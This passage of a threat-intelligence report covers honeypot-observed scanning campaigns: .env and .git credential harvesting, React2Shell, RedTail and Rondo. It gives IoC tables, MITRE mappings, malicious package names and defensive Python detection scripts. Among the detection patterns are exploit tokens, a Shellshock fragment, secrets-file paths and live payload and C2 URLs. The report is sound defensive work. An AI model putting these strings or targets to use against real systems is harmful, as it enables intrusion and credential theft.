| 125.229.26.140 | 🇹🇼 Taiwan | 13 |
| 39.109.104.26 | 🇸🇬 Singapore | 13 |
| 41.210.171.82 | 🇰🇪 Kenya | 13 |
| 43.224.8.199 | 🇧🇩 Bangladesh | 13 |

POST /wsman HTTP/1.1
User-Agent: Python WinRM client

Assessment: Coordinated scanning campaign from Asian IP addresses targeting Windows hosts with exposed WinRM. Pattern suggests botnet-controlled scanning infrastructure.


Observed Campaign: Environment & Secrets Harvesting

Threat Type: Credential Theft / Reconnaissance
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 1,883+

Baysec honeypots captured 1,883+ requests targeting environment files, Git repositories, and cloud credentials. This represents systematic automated scanning for exposed secrets in web applications.

Environment File Scanning

Total Events: 1,761

| Target Path | Events | Risk Level |
|---|---|---|
| /.env | 229 | CRITICAL |
| /api/.env | 76 | CRITICAL |
| /admin/.env | 62 | CRITICAL |
| /backend/.env | 60 | CRITICAL |
| /.env.local | 58 | HIGH |
| /.env.example | 47 | MEDIUM |
| /app/.env | 33 | CRITICAL |
| /core/.env | 27 | CRITICAL |
| /.env.production | 25 | CRITICAL |
| /.env.bak | 24 | CRITICAL |
| /.env.save | 24 | CRITICAL |
| /.env.zip | 15 | CRITICAL |
| /.env.rar | 15 | CRITICAL |
| /.aws/credentials | 6 | CRITICAL |

Git Repository Exposure

Total Events: 122

| Target Path | Events | Information Leaked |
|---|---|---|
| /.git/config | 55 | Remote URLs, credentials |
| /.git/index | 19 | File structure |
| /.git/HEAD | 6 | Branch information |
| /admin/.git/config | 4 | Admin repo secrets |
| /api/.git/config | 4 | API repo secrets |

Top Credential Harvesters

| Source IP | Country | Events | Primary Target |
|---|---|---|---|
| 78.142.18.135 | 🇷🇺 Russia | 128 | .env files |
| 78.153.140.177 | 🇷🇺 Russia | 119 | .env files |
| 62.146.234.188 | 🇩🇪 Germany | 115 | .env + .git |
| 152.42.188.148 | 🇸🇬 Singapore | 105 | .env + .git |
| 178.128.89.216 | 🇸🇬 Singapore | 105 | .env + .git |
| 78.153.140.203 | 🇷🇺 Russia | 101 | .env files |
| 206.71.149.226 | 🇺🇸 USA | 99 | .env files |
| 78.153.140.224 | 🇷🇺 Russia | 91 | .env files |
| 78.153.140.179 | 🇷🇺 Russia | 87 | AWS credentials |
| 213.209.159.150 | 🇩🇪 Germany | 19 | .git repos |

Note: the 78.153.140.x subnet shows coordinated Russian-nexus scanning, with multiple IPs from the same /24 block.

Detection Rules

# Environment file access
GET.*\.env($|[./\?])
GET.*/\.env\.(local|production|staging|bak|save|old|backup)
GET.*\.env\.(zip|rar|tar\.gz|7z)

# Git exposure
GET.*\/\.git\/(config|index|HEAD|objects|refs)

# AWS credentials
GET.*\/\.aws\/(credentials|config)
GET.*/config/aws_settings

Assessment: Environment file scanning is fully automated and targets both development artifacts (.env.example) and production secrets. The systematic approach to backup file extensions (.bak, .save, .zip) indicates sophisticated tooling. Immediate risk to exposed deployments - attackers can obtain database credentials, API keys, and cloud access tokens.
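The rules above applied to a web-server access log, as an added example (not Baysec tooling): each request path is matched against the report's patterns in most-specific-first order, tagged with the risk level from the target-path table, and the HTTP status is kept so that a 2xx on a secrets path (the file was actually served) stands out from a 404 probe. The log lines are constructed and use documentation-range addresses.

```python
import re

# Constructed combined-log-format lines; 203.0.113.x and 198.51.100.x are
# documentation ranges, not the scanners listed in this report.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Dec/2025:03:14:07 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Dec/2025:03:14:08 +0000] "GET /api/.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Dec/2025:03:14:09 +0000] "GET /.env.example HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [18/Dec/2025:03:15:01 +0000] "GET /.env.zip HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.12 - - [18/Dec/2025:03:16:22 +0000] "GET /.git/config HTTP/1.1" 200 263 "-" "python-requests/2.31"
203.0.113.12 - - [18/Dec/2025:03:16:23 +0000] "GET /.aws/credentials HTTP/1.1" 404 196 "-" "python-requests/2.31"
198.51.100.5 - - [18/Dec/2025:03:17:00 +0000] "GET /environment/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

RISK_ORDER = ["LOW", "MEDIUM", "HIGH", "CRITICAL"]

# The report's rules, most specific first so that .env.example gets MEDIUM
# (as in the target-path table) instead of falling through to the generic
# .env rule. Risk levels follow that table.
RULES = [
    ("env-example", re.compile(r"\.env\.example($|[/?])"), "MEDIUM"),
    ("env-local", re.compile(r"\.env\.local($|[/?])"), "HIGH"),
    ("env-backup", re.compile(r"\.env\.(bak|save|old|backup)($|[/?])"), "CRITICAL"),
    ("env-archive", re.compile(r"\.env\.(zip|rar|tar\.gz|7z)($|[/?])"), "CRITICAL"),
    ("env-file", re.compile(r"\.env($|[./?])"), "CRITICAL"),
    ("git-exposure", re.compile(r"/\.git/(config|index|HEAD|objects|refs)"), "CRITICAL"),
    ("aws-credentials", re.compile(r"/\.aws/(credentials|config)|/config/aws_settings"), "CRITICAL"),
]


def scan(log_text):
    """One finding per matching request: (ip, path, rule, risk, served).
    served is True on a 2xx response (the file exists and was handed out);
    a 404 is evidence of scanning only."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["target"].split("?", 1)[0]
        for name, pattern, risk in RULES:
            if pattern.search(path):
                findings.append((m["ip"], path, name, risk, m["status"].startswith("2")))
                break
    return findings


def summarise(findings):
    """Per-source totals like the harvester table: events, files served, top risk."""
    per_ip = {}
    for ip, _path, _rule, risk, served in findings:
        entry = per_ip.setdefault(ip, {"events": 0, "served": 0, "max_risk": "LOW"})
        entry["events"] += 1
        entry["served"] += int(served)
        if RISK_ORDER.index(risk) > RISK_ORDER.index(entry["max_risk"]):
            entry["max_risk"] = risk
    return per_ip


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, path, rule, risk, served in results:
        print(f"{ip:15} {risk:8} {rule:16} {path} {'SERVED' if served else 'probe'}")
    print(summarise(results))
```

A source with `served > 0` on a CRITICAL path is an incident (rotate the exposed credentials), not just a scanner to block.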


MITRE ATT&CK Mapping

Execution

Persistence

| Technique | ID | Observed In |
|---|---|---|
| Browser Extensions | T1176 | GhostPoster |

Defense Evasion

| Technique | ID | Observed In |
|---|---|---|
| Obfuscated Files or Information | T1027 | RUSTRIC, PYTRIC, lotusbail, GhostPoster |
| Obfuscated Files or Information: Steganography | T1027.003 | ClickFix, GhostPoster |
| Signed Binary Proxy Execution | T1218 | PYTRIC, APT37 Artemis |
| Subvert Trust Controls: Code Signing | T1553.002 | MacSync Stealer |
| Virtualization/Sandbox Evasion | T1497 | DriverFixer0428, MacSync Stealer |

Credential Access

| Technique | ID | Observed In |
|---|---|---|
| Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | MacSync, Webrat, LummaC2 |
| Credentials from Password Stores: Keychain | T1555.001 | MacSync Stealer |
| Brute Force: Password Guessing | T1110.001 | Baysec Honeypot (SSH, SMTP AUTH) |
| Brute Force: Password Spraying | T1110.003 | Baysec Honeypot (SSH, SMB, NTLM) |

Lateral Movement

| Technique | ID | Observed In |
|---|---|---|
| Remote Services: SMB/Windows Admin Shares | T1021.002 | Baysec Honeypot (attackers attempting SMB auth) |

Discovery

| Technique | ID | Observed In |
|---|---|---|
| Software Discovery: Security Software Discovery | T1518.001 | RUSTRIC, PYTRIC, DriverFixer0428 |

Command and Control

| Technique | ID | Observed In |
|---|---|---|
| Application Layer Protocol: Web Protocols | T1071.001 | RUSTRIC, PYTRIC, MacSync, Webrat |
| Web Service | T1102 | APT37 Artemis (Yandex, pCloud), DriverFixer0428 (Dropbox) |
| Ingress Tool Transfer | T1105 | RUSTRIC, PYTRIC, ClickFix |

Initial Access

| Technique | ID | Observed In |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Baysec Honeypot (React2Shell, PHP CGI, Hikvision, SAP NetWeaver, GeoServer, Apache, PHPUnit, Shellshock, OpenWRT) |
| Phishing: Spearphishing Attachment | T1566.001 | RUSTRIC, PYTRIC, APT37 Artemis |
| Phishing: Spearphishing Link | T1566.002 | RUSTRIC, PYTRIC, Contagious Interview |
| Supply Chain Compromise: Compromise Software Supply Chain | T1195.002 | lotusbail, GhostPoster, PyPI packages |

Reconnaissance

| Technique | ID | Observed In |
|---|---|---|
| Active Scanning: Vulnerability Scanning | T1595.002 | Baysec Honeypot (Cisco VPN, IoT devices, environment files) |
| Search Open Technical Databases | T1596 | Baysec Honeypot (DNS reconnaissance) |

Resource Development

| Technique | ID | Observed In |
|---|---|---|
| Acquire Infrastructure: Virtual Private Server | T1583.003 | React2Shell (DigitalOcean scanners), RedTail, Rondo Botnet |

Collection

| Technique | ID | Observed In |
|---|---|---|
| Automated Collection | T1119 | Baysec Honeypot (environment file harvesting, .git exposure scanning) |
| Data from Cloud Storage | T1530 | Baysec Honeypot (AWS credentials harvesting attempts) |

Indicators of Compromise

Network Indicators

React2Shell (CVE-2025-55182) - Extended IoCs (Dec 17-27, 2025) - 223 events, 26 IPs:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 94.154.35.154 | React2Shell (Actor 1) | Staging Server /weball.sh | Block at perimeter |
| 193.142.147.209:12323 | React2Shell (Actor 1) | Reverse Shell C2 | Block egress |
| 5.255.121.141 | React2Shell (Actor 2) | Payload Server | Block at perimeter |
| 45.154.98.124 | React2Shell (Actor 2) | Scanner (31 events) | Block/monitor |
| 95.214.55.246 | React2Shell | Primary Scanner (78 events) | Block/monitor |
| 5.187.35.21 | React2Shell | Go-http-client Scanner (14 events) | Block/monitor |
| 130.12.180.207 | React2Shell | Scanner (USA) | Block/monitor |
| 192.159.99.95 | React2Shell | Multi-vector Scanner (UK) | Block/monitor |
| 194.127.199.125 | React2Shell | Scanner (Luxembourg) | Block/monitor |
| 195.24.237.218 | React2Shell | Scanner (Russia) | Block/monitor |
| 216.250.122.216 | React2Shell | Scanner (USA) | Block/monitor |
| 84.234.98.89 | React2Shell | Scanner (Sweden) | Block/monitor |
| 170.64.136.199 | React2Shell | DigitalOcean Scanner | Block/monitor |
| 170.64.145.146 | React2Shell | DigitalOcean Scanner | Block/monitor |
| 170.64.193.109 | React2Shell | DigitalOcean Scanner | Block/monitor |
| 170.64.204.250 | React2Shell | DigitalOcean Scanner | Block/monitor |

RedTail / PHP CGI (CVE-2024-4577) - Extended IoCs (Dec 17-27, 2025) - 1,276 events, 30+ IPs:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 178.16.55.224 | RedTail | C2 Server | Block at perimeter |
| 2001:41d0:601:1100::779b | RedTail | IPv6 Primary Scanner (162 events) | Block/monitor |
| 163.5.148.15 | RedTail | PHP CGI + PHPUnit Scanner (94 events) | Block/monitor |
| 62.146.234.188 | RedTail | Multi-vector Scanner (Germany, 72 events) | Block/monitor |
| 152.42.188.148 | RedTail | PHP CGI Scanner (Singapore, 66 events) | Block/monitor |
| 178.128.89.216 | RedTail | PHP CGI Scanner (Singapore, 66 events) | Block/monitor |
| 103.168.91.76 | RedTail | PHPUnit RCE Scanner (47 events) | Block/monitor |
| 144.126.203.185 | RedTail | Multi-vector Scanner (USA) | Block/monitor |
| 152.69.216.125 | RedTail | PHP CGI Scanner (USA) | Block/monitor |
| 157.173.105.78 | RedTail | PHPUnit RCE Scanner (UK) | Block/monitor |
| 158.220.81.232 | RedTail | PHP CGI Scanner (Switzerland) | Block/monitor |
| 165.154.231.140 | RedTail | Multi-vector Scanner (Canada) | Block/monitor |
| 173.249.5.123 | RedTail | Multi-vector Scanner (Germany) | Block/monitor |
| 207.244.246.26 | RedTail | PHP CGI Scanner (USA) | Block/monitor |
| 216.108.237.50 | RedTail | PHP CGI Scanner (USA) | Block/monitor |
| 217.154.69.208 | RedTail | PHPUnit RCE Scanner (UK) | Block/monitor |
| 45.192.10.196 | RedTail | PHP CGI Scanner (South Africa) | Block/monitor |

Rondo Botnet (Mirai Variant) - IoCs:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 41.231.37.153 | Rondo Botnet | C2/Payload Server (Tunisia) | Block at perimeter |
| 192.159.99.95 | Rondo Botnet | Primary Scanner (UK) | Block/monitor |
| rondo2012@atomicmail.io | Rondo Botnet | Attribution marker | Hunt in logs |
| http://41.231.37.153/rondo.*.sh | Rondo Botnet | Payload URLs | Block at proxy |

IoT & Network Device Exploitation - IoCs:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 89.42.231.239 | Hikvision Scanner | CVE-2021-36260 (Romania) | Block/monitor |
| 89.42.231.244 | Hikvision Scanner | CVE-2021-36260 (Romania) | Block/monitor |
| 5.182.209.113 | Hikvision Scanner | CVE-2021-36260 (Luxembourg) | Block/monitor |
| 147.124.204.3 | Apache Traversal | CVE-2021-41773 (USA) | Block/monitor |
| 87.121.84.181 | Apache Traversal | CVE-2021-41773 (Bulgaria) | Block/monitor |
| 103.203.76.79 | WinRM Scanner | Remote Admin (India) | Block/monitor |
| 111.92.61.249 | WinRM Scanner | Remote Admin (India) | Block/monitor |
| 113.160.1.118 | WinRM Scanner | Remote Admin (Vietnam) | Block/monitor |
| 114.143.212.195 | WinRM Scanner | Remote Admin (India) | Block/monitor |

Cisco VPN (AnyConnect) Probing - IoCs (73 events, 19 DigitalOcean IPs):

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 104.248.12.12 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 137.184.178.219 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 137.184.254.136 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 137.184.26.12 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 138.68.141.22 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 147.182.254.157 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 159.223.107.241 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 162.243.96.90 | Cisco VPN | DigitalOcean Scanner | Monitor |
| 170.64.138.231 | Cisco VPN | DigitalOcean Scanner | Monitor |

Environment & Secrets Harvesting - IoCs (360 events):

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 78.153.140.179 | Env Harvesting | .env Scanner (Russia, 118 events) | Block/monitor |
| 78.153.140.224 | Env Harvesting | .env Scanner (Russia, 37 events) | Block/monitor |
| 139.162.8.26 | Env Harvesting | .env Scanner (35 events) | Block/monitor |
| 78.153.140.151 | Env Harvesting | .env Scanner (Russia, 27 events) | Block/monitor |
| 213.209.159.150 | Git Exposure | .git Scanner (Germany, 19 events) | Block/monitor |
| 45.148.10.23 | Env Harvesting | .env Scanner (16 events) | Block/monitor |
| 78.153.140.203 | Env Harvesting | .env Scanner (Russia) | Block/monitor |
| 185.241.208.170 | Env Harvesting | .env Scanner | Block/monitor |
| 80.94.95.98 | Env Harvesting | .env Scanner | Block/monitor |

SSH Brute Force - Top Attackers (395K+ events):

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 34.29.105.211 | SSH Brute Force | Primary attacker (122K events) | Block at perimeter |
| 195.178.110.30 | SSH Brute Force | 7.4K events | Block/monitor |
| 92.118.39.62 | SSH Brute Force | 6.5K events | Block/monitor |
| 80.94.92.40 | SSH Brute Force | 6.4K events | Block/monitor |
| 91.92.241.148 | SSH Brute Force | 6.1K events | Block/monitor |

SMTP Open Relay Probing - 2,600 events:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 103.39.64.54 | SMTP Abuse | Primary relay scanner (1K events) | Block at perimeter |
| 45.144.212.19 | SMTP Abuse | Relay scanner (1K events) | Block at perimeter |
| 45.144.212.238 | SMTP Abuse | Relay probing (66 events) | Block/monitor |
| 78.153.140.207 | SMTP Abuse | Open relay test emails to siagabaja.com | Block/monitor |
| 87.251.78.220 | SMTP Abuse | Relay probing (17 events) | Block/monitor |
| 158.94.209.3 | SMTP Abuse | Windows host WIN-7N1FIECL6IC | Block/monitor |

DNS Reconnaissance - 1,355 events:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 141.98.83.48 | DNS Recon | Primary scanner (808 events) | Block/monitor |
| 176.65.134.118 | DNS Recon | TXT/A record probing (75 events) | Block/monitor |
| 206.191.154.44 | DNS Recon | DNS enumeration (62 events) | Block/monitor |
| 87.121.84.13 | DNS Recon | DNS probing (33 events) | Block/monitor |
| 192.210.187.83 | DNS Recon | DNS enumeration (28 events) | Block/monitor |

Other Campaigns:

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| 141.98.80.175 | ClickFix | C2 Server | Block at perimeter |
| zkcall.net | MacSync Stealer | Distribution | Block at DNS/proxy |
| Yandex Cloud: tanessha.samuel | APT37 Artemis | C2 Account | Monitor for connections |
| pCloud: tanessha.samuel | APT37 Artemis | C2 Account | Monitor for connections |
| 113.160.186.2 | Hospital SMB Scanning | Compromised Host | Block at perimeter |
| 78.153.140.179 | Credential Harvesting | Scanner | Block at perimeter |
| 78.153.140.224 | Credential Harvesting | Scanner | Block at perimeter |
| 188.237.58.92 | Protocol Attacks | Scanner | Block at perimeter |
| 103.39.64.54 | SMTP Brute Force | Scanner | Block at perimeter |
| 45.144.212.19 | SMTP Brute Force | Scanner | Block at perimeter |
| 87.251.78.220 | SMTP Phishing Distribution | Phishing Infra | Block at perimeter |
| 102.211.42.66 | SMTP Phishing Distribution | Phishing Infra | Block at perimeter |

Email/Sender Indicators (Phishing)

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| accounts@globalfinancesolutions.com | Financial Phishing | Sender | Block/flag in email gateway |
| office@cryptoyieldx.com | Crypto Scam | Sender | Block/flag in email gateway |
| dpr@priv8shop.com | Unknown Campaign | Sender | Block/flag in email gateway |

User-Agent Signatures

| User-Agent | Campaign | Events | Action |
|---|---|---|---|
| libredtail-http | RedTail/PHP CGI | 574 | Block at WAF/proxy |
| Mozilla/5.0 (rondo2012@atomicmail.io) | Rondo Botnet | 122 | Block at WAF/proxy |
| () { :; }; ... | Rondo (Shellshock) | 27 | Block at WAF/proxy |
| Python WinRM client | WinRM Exploitation | 70 | Block/monitor |
| Go-http-client/1.1 | React2Shell, Scanning | 380 | Monitor (context-dependent) |
| Mozilla/5.0 zgrab/0.x | ZGrab Scanner | 109 | Monitor (research tool) |
| Mozilla/5.0 (compatible; Scanner/1.0) | Generic Scanner | 100 | Monitor |
| chrome/1.2.3 | Malicious Scanner | 16 | Block |
| xfa1 / xfa1,nvdorz,nvd0rz | Suspicious Scanner | 37 | Block |
| cypex.ai/scanning | CYPEX Scanner | 194 | Monitor (commercial) |
| Assetnote/1.0.0 | Assetnote Scanner | 40 | Monitor (commercial) |
| l9scan/2.0 | LeakIX Scanner | 35 | Monitor (research) |

URL Indicators

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| http://94.154.35.154/weball.sh | React2Shell | Staging URL | Block at proxy |
| https://178.16.55.224/sh | RedTail | Payload URL | Block at proxy |

File Indicators

| Indicator | Campaign | Type | Action |
|---|---|---|---|
| rasmanesc.exe | Webrat | Dropper | Detect/block |
| version.dll (side-loaded) | APT37 Artemis | Malicious DLL | Detect side-loading |
| zk-call-messenger-installer-3.9.2-lts.dmg | MacSync Stealer | Installer | Block |
| weball.sh | React2Shell | Post-exploit payload | Detect/block |
| /tmp/x.sh | React2Shell | Staged script | Hunt on endpoints |

Malicious Packages

| Registry | Package Name | Campaign | Action |
|---|---|---|---|
| npm | lotusbail | WhatsApp Stealer | Remove; unlink WhatsApp devices |
| PyPI | smtrlib | Telegram Stealer | Remove |
| PyPI | runtimeutils | Infostealer | Remove |
| PyPI | ai-cypher | Infostealer | Remove |
| PyPI | unizip | Infostealer | Remove |

Browser Extensions (GhostPoster)

Remove and reset passwords if installed:

  • Free VPN Forever
  • screenshot-saved-easy
  • weather-best-forecast
  • google-translate-pro-extension
  • dark-reader-for-ff

Recommendations

Immediate Actions

| Priority | Action | Details |
|---|---|---|
| CRITICAL | Patch SAP NetWeaver | CVE-2025-31324 - CVSS 10.0, unauthenticated file upload |
| CRITICAL | Patch n8n | CVE-2025-68613 - 103K+ exposed instances. Upgrade to 1.120.4+ |
| CRITICAL | Patch PHP | CVE-2024-4577 - EPSS 94.37%. Upgrade to 8.1.29+/8.2.20+/8.3.8+ |
| CRITICAL | Patch Next.js/RSC | CVE-2025-55182 - Actively exploited with confirmed C2 |
| CRITICAL | Patch Apache | CVE-2021-41773 - 402 attempts. Upgrade Apache 2.4.49/2.4.50 |
| HIGH | Patch Hikvision | CVE-2021-36260 - 103 attempts. Update camera firmware |
| HIGH | Block C2s | See Indicators of Compromise for full blocklist |
| HIGH | Audit npm/PyPI | Remove lotusbail (unlink WhatsApp devices), smtrlib, runtimeutils |
| HIGH | Remove extensions | GhostPoster Firefox extensions (17 total) |
| MEDIUM | Block User-Agent | libredtail-http (RedTail fingerprint) |
| MEDIUM | Audit Docker APIs | Restrict to authenticated access only |

Detection Signatures

WAF/IDS Rules (React2Shell CVE-2025-55182):

Block if:
  HTTP POST AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

HTTP Header Indicators (React2Shell):

| Header | Value | Confidence |
|---|---|---|
| Next-Action | x or 1 | MEDIUM |
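
The WAF rule and the header indicator above, combined into one request-inspection function as an added example (not the report's or any vendor's code): a POST whose body matches the pattern is blocked, while a degenerate Next-Action value on its own only raises a medium-confidence alert, as the table rates it. The sample requests are constructed; the form-decoding pass is a hardening step added here, not something the rule states.

```python
import re
from urllib.parse import unquote_plus

# Body pattern taken from the WAF rule above.
BODY_RE = re.compile(r"(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)")

# The header table rates the values "x" and "1" as MEDIUM confidence; a real
# server action carries a long generated action id instead.
SUSPICIOUS_ACTION_IDS = {"x", "1"}


def inspect(request):
    """Evaluate one request dict ('method', 'headers', 'body').

    Returns (verdict, confidence, reason). The body is matched both raw and
    after form-decoding so a percent-encoded copy of the pattern is still
    caught (added hardening, not part of the report's rule).
    """
    method = request.get("method", "").upper()
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    body = request.get("body", "")
    if method == "POST":
        for candidate in (body, unquote_plus(body)):
            if BODY_RE.search(candidate):
                return ("BLOCK", "HIGH", "React2Shell body pattern")
    if headers.get("next-action", "") in SUSPICIOUS_ACTION_IDS:
        return ("ALERT", "MEDIUM", "degenerate Next-Action header value")
    return ("ALLOW", None, None)


# Constructed sample traffic: a normal server action, a header-only probe,
# a body hit, a percent-encoded body hit, and a GET carrying the token
# (ignored by the rule, which only inspects POST bodies).
SAMPLE_REQUESTS = [
    {"method": "POST", "headers": {"Next-Action": "7f3a" * 10}, "body": '["hello"]'},
    {"method": "POST", "headers": {"Next-Action": "x"}, "body": '["probe"]'},
    {"method": "POST", "headers": {"Next-Action": "x"}, "body": '{"k":"$1:__proto__:then"}'},
    {"method": "POST", "headers": {}, "body": "v=%241%3Aconstructor%3Aconstructor"},
    {"method": "GET", "headers": {}, "body": "process.mainModule"},
]


def verdicts(requests):
    """Verdict per request, in order."""
    return [inspect(r)[0] for r in requests]


if __name__ == "__main__":
    for req, (verdict, confidence, reason) in zip(SAMPLE_REQUESTS, map(inspect, SAMPLE_REQUESTS)):
        print(f"{verdict:5} {confidence or '-':6} {req['method']:4} {reason or ''}")
```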

Path-Based Detection (WAF/IDS):

.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*

Hunt Queries:

  • File: /tmp/x.sh, weball.sh on web servers
  • User-Agent: libredtail-http
  • Connections to: 94.154.35.154, 193.142.147.209:12323

Network IOCs (Quick Block List):

94.154.35.154       # React2Shell staging
193.142.147.209     # React2Shell C2 (port 12323)
178.16.55.224       # RedTail C2
163.5.148.15        # RedTail scanner
141.98.80.175       # ClickFix C2
zkcall.net          # MacSync distribution
103.39.64.54        # SMTP brute force
87.251.78.220       # SMTP phishing

Assessment Confidence Levels

| Assessment | Confidence | Basis |
|---|---|---|
| Webrat campaign attribution (criminal) | HIGH | Kaspersky analysis; consistent TTPs with financially-motivated actors |
| APT37 Artemis attribution (DPRK) | HIGH | Genians analysis; infrastructure overlap; historical APT37 TTPs |
| Contagious Interview attribution (DPRK) | HIGH | FBI action; MITRE ATT&CK group documentation; historical patterns |
| CVE-2025-68613 exposure count | HIGH | Censys scan data (Dec 22 2025) |
| ClickFix campaign active status | MEDIUM | Some infrastructure disrupted by Operation Endgame; likely to reconstitute |
| MacSync Stealer mitigated | MEDIUM | Apple revoked certificate; operators may obtain new signing |

Conclusion

Key Judgments:

  1. Supply chain is the primary attack vector for targeting developers and security professionals. npm, PyPI, and browser extension stores require continuous monitoring.

  2. Steganography has become mainstream in criminal operations. Multiple independent campaigns (ClickFix, GhostPoster) adopted image-based payload delivery within the same period.

  3. Code signing provides insufficient trust. Threat actors use signed and notarized macOS applications to bypass Gatekeeper, rendering signature-only trust models obsolete.

  4. Developer targeting is strategic, not opportunistic. Webrat operators deliberately pivoted from game cheats to fake exploit repositories, recognizing the higher value of security researcher credentials.

  5. State-sponsored actors remain active. Both APT37 (Artemis) and Contagious Interview demonstrate North Korea's continued focus on credential theft and intelligence gathering.

  6. Legacy vulnerabilities remain actively exploited. Baysec honeypots captured mass scanning for Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and Apache path traversal (CVE-2021-41773) - vulnerabilities years old but still profitable for attackers.

  7. Geographic threat concentration persists. Russia (1.1M+ events) and Egypt (2.4M+ events) remain dominant sources of credential harvesting and brute force attacks, with captured credentials revealing compromised enterprise infrastructure.

Bottom Line: The boundary between “legitimate” open-source platforms and malware distribution has effectively dissolved. Defenders must extend monitoring to developer ecosystems and treat GitHub, npm, PyPI, and browser stores as potential attack vectors with the same rigor applied to traditional threat sources. Additionally, patching legacy vulnerabilities remains critical - attackers continue exploiting years-old CVEs at scale.


References

Closed Source Intelligence

Baysec CTI - proprietary threat intelligence platform providing real-time ransomware tracking, leak site monitoring, dark web surveillance, and credential exposure detection.

Baysec Intelligence AI - AI-assisted analysis for report enrichment, IOC correlation, and threat actor attribution.

Baysec Sensors - Distributed honeypot network capturing SSH/SMB/RDP/MSSQL/SMTP/DNS attacks, credential harvesting attempts, phishing distribution attempts, and exploit delivery.


Open Source Intelligence (OSINT)

Threat Research Reports

| Topic | Source | Link |
|---|---|---|
| Webrat via fake GitHub exploits | Kaspersky/Securelist | securelist.com |
| Webrat GitHub analysis | BleepingComputer | bleepingcomputer.com |
| ClickFix steganography | Huntress | huntress.com |
| ClickFix fake updates | Malwarebytes | malwarebytes.com |
| GhostPoster Firefox extensions | The Hacker News | thehackernews.com |
| GhostPoster steganography | BleepingComputer | bleepingcomputer.com |
| lotusbail npm package | SecurityWeek | securityweek.com |
| lotusbail WhatsApp theft | BleepingComputer | bleepingcomputer.com |
| MacSync Stealer evolution | Jamf Threat Labs | jamf.com |
| MacSync signed malware | SecurityWeek | securityweek.com |
| APT37 Artemis campaign | Genians | genians.co.kr |
| DriverFixer0428 (DPRK) | LunchM0n3y | lunchm0n3y.com |
| n8n CVE-2025-68613 | The Hacker News | thehackernews.com |
| Contagious Interview (FBI) | Infosecurity Magazine | infosecurity-magazine.com |
| Operation Endgame | Europol | europol.europa.eu |

Vulnerabilities

| CVE Identifier | Description | Link |
|---|---|---|
| CVE-2025-68613 | n8n RCE (CVSS 9.9) | nvd.nist.gov |
| CVE-2025-55182 | React Server Components RCE | nvd.nist.gov |
| CVE-2025-31324 | SAP NetWeaver File Upload (CVSS 10.0) | nvd.nist.gov |
| CVE-2024-4577 | PHP CGI Argument Injection | nvd.nist.gov |
| CVE-2024-36401 | GeoServer OGC Filter RCE | nvd.nist.gov |
| CVE-2024-21899 | QNAP NAS Authentication Bypass | nvd.nist.gov |
| CVE-2023-44487 | HTTP/2 Rapid Reset DoS | nvd.nist.gov |
| CVE-2023-1389 | TP-Link Archer Command Injection | nvd.nist.gov |
| CVE-2021-41773 | Apache HTTP Server Path Traversal | nvd.nist.gov |
| CVE-2021-42013 | Apache HTTP Server Path Traversal | nvd.nist.gov |
| CVE-2021-36260 | Hikvision Command Injection | nvd.nist.gov |
| CVE-2021-35395 | Realtek SDK Buffer Overflow | nvd.nist.gov |
| CVE-2020-3452 | Cisco ASA/FTD Path Traversal | nvd.nist.gov |
| CVE-2020-0796 | SMBGhost RCE | nvd.nist.gov |
| CVE-2019-20933 | InfluxDB Authentication Bypass | nvd.nist.gov |
| CVE-2019-16278 | Nostromo nhttpd RCE | nvd.nist.gov |
| CVE-2018-20062 | ThinkPHP RCE | nvd.nist.gov |
| CVE-2017-9841 | PHPUnit RCE | nvd.nist.gov |
| CVE-2016-1555 | Netgear Command Injection | nvd.nist.gov |
| CVE-2014-6271 | Shellshock (Bash RCE) | nvd.nist.gov |
| CISA KEV Catalog | Known Exploited Vulnerabilities | cisa.gov |